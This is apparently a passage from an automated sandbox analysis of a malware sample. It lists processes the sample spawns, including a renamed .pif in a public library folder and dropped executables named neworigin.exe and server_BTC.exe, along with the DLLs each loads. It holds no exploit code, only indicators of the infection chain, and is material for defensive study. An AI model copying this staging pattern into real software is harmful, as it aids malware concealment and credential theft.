                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFProcess created: C:\Users\Public\Libraries\lxsyrsiW.pif C:\Users\Public\Libraries\lxsyrsiW.pif
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifProcess created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: url.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: spp.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: vssapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: vsstrace.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: ieproxy.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: smartscreenps.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: smartscreenps.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: smartscreenps.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: winhttpcom.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: ??????????.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: ??????????.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: ??????????.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: ???.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: ???.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: ???.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: ????.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: ???e???????????.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: ?.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: ??l.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: tquery.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: cryptdll.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: mssip32.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: advapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: sppwmi.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: sppcext.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: winscard.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: devobj.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\2jbMIxCFsK.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: esent.dllJump to behavior
                      Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: esent.dllJump to behavior
                      Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: esent.dllJump to behavior
                      Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\esentutl.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: slc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: linkinfo.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
